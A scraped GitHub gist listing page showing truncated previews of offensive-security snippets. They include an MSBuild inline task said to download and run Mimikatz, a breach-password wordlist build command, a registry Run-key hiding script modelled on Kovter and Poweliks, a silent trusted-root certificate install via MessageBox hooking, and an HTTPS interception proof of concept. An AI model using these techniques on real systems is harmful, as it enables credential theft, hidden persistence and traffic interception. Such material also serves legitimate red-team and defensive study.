Skip to content

Instantly share code, notes, and snippets.

View cephurs's full-sized avatar

cephurs

145 followers · 1.3k following
View GitHub Profile
@cephurs
cephurs / vMetaDate.sh
Created July 23, 2017 12:06 — forked from cryptolok/vMetaDate.sh
small tool to retreive vk.com (vkontakte) users hidden metadata (state, access, dates, counts, etc) anonymously (without login)
#!/bin/bash
# small tool to retreive vk.com (vkontakte) users hidden metadata (state, access, dates, counts, etc) anonymously (without login)
# sudo apt install curl
parse(){
local IFS=\>
read -d \< CELL VALUE
}
@cephurs
cephurs / katz.xml
Created July 27, 2017 23:18
Downloads Mimikatz From GitHub, Executes Inside of MsBuild.exe
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml -->
<Target Name="Hello">
<SharpLauncher >
</SharpLauncher>
</Target>
<UsingTask
TaskName="SharpLauncher"
TaskFactory="CodeTaskFactory"
@cephurs
cephurs / EQgroup.md
Created August 3, 2017 01:49 — forked from bontchev/EQgroup.md
Curated list of links describing the leaked Equation Group tools for Windows

Links describing the leaked EQ Group tools for Windows

Repositories and ports

Installation and usage guides

@cephurs
cephurs / check
Created November 11, 2017 14:29 — forked from 83leej/check
just a simple script that grabs two file if they are currently not there, allows checking for IP ranges by providing a simple name such as 'godaddy' or 'digitalocean', it then returns the results and provides a file name rangelist with the found ranges.
#!/bin/bash
NAMETOCHECK=$1
if [ ! -d asninfo ]; then
mkdir asninfo;
echo "Created: asninfo/";
fi
if [ ! -f asninfo/data-used-autnums.txt ]; then
@cephurs
cephurs / breachcompilation.txt
Created December 19, 2017 14:44
1.4 billion password breach compilation wordlist
wordlist created from original 41G stash via:
grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt
Then, compressed with:
7z a breachcompilation.txt.7z breachcompilation.txt
Size:
@cephurs
cephurs / PSReflect-RegHide.ps1
Created January 3, 2018 13:54 — forked from brianreitz/PSReflect-RegHide.ps1
PowerShell script to hide a Run key like Reghide/Kovter/Poweliks
# requires PSReflect.ps1 to be in the same directory as this script
. .\PSReflect.ps1
$Module = New-InMemoryModule -ModuleName RegHide
# Define our structs.
# https://msdn.microsoft.com/en-us/library/windows/hardware/ff564879(v=vs.85).aspx
# typedef struct _UNICODE_STRING {
# USHORT Length;
# USHORT MaximumLength;
@cephurs
cephurs / PSReflect-RegKeyFixer.ps1
Created January 3, 2018 13:55 — forked from brianreitz/PSReflect-RegKeyFixer.ps1
A port of Joakim Schicht's RegKeyFixer using PSReflect. Will find and delete "hidden" value entries created by PSReflect-RegHide.ps1
# A port of Joakim Schicht's RegKeyFixer in PowerShell.
# https://github.com/jschicht/RegKeyFixer
#
# This script will recursively search keys starting from the Keyname
# for any value entry names with null characters
# Example usage:
# $SID = [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value
# $KeyName = "\Registry\User\$SID\SOFTWARE\Microsoft\Windows\CurrentVersion"
# $Results = Get-HiddenNames -KeyName $KeyName
# $Results | Remove-HiddenNames
@cephurs
cephurs / google-dorks
Created January 13, 2018 03:35 — forked from clarketm/google-dorks
Listing of a number of useful Google dorks.
" _ _ "
" _ /|| . . ||\ _ "
" ( } \||D ' ' ' C||/ { % "
" | /\__,=_[_] ' . . ' [_]_=,__/\ |"
" |_\_ |----| |----| _/_|"
" | |/ | | | | \| |"
" | /_ | | | | _\ |"
It is all fun and games until someone gets hacked!
@cephurs
cephurs / script.ps1
Created January 24, 2018 08:13
Hooking MessageBox For No-Prompt Trusted Root Certificate Install
#Verify Not Present
( Get-ChildItem Cert:\CurrentUser\Root | Where-Object {$_.Subject -match "__Interceptor_Trusted_Root" })
#Import-Certificate
( Get-ChildItem -Path C:\Test\thing.cer ) | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root
#Prompted
Remove-Item -Path cert:\CurrentUser\Root\5C205339AE9FA846FA99D3FFF0CDEE65EB8D8E99
@cephurs
cephurs / InterceptorThing.ps1
Created January 24, 2018 18:39
Interceptor - Normal User No Admin Required.
<#
.SYNOPSIS
This script demonstrates the ability to capture and tamper with Web sessions.
For secure sessions, this is done by dynamically writing certificates to match the requested domain.
This is only proof-of-concept, and should be used cautiously, to demonstrate the effects of such an attack.
Function: Interceptor
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause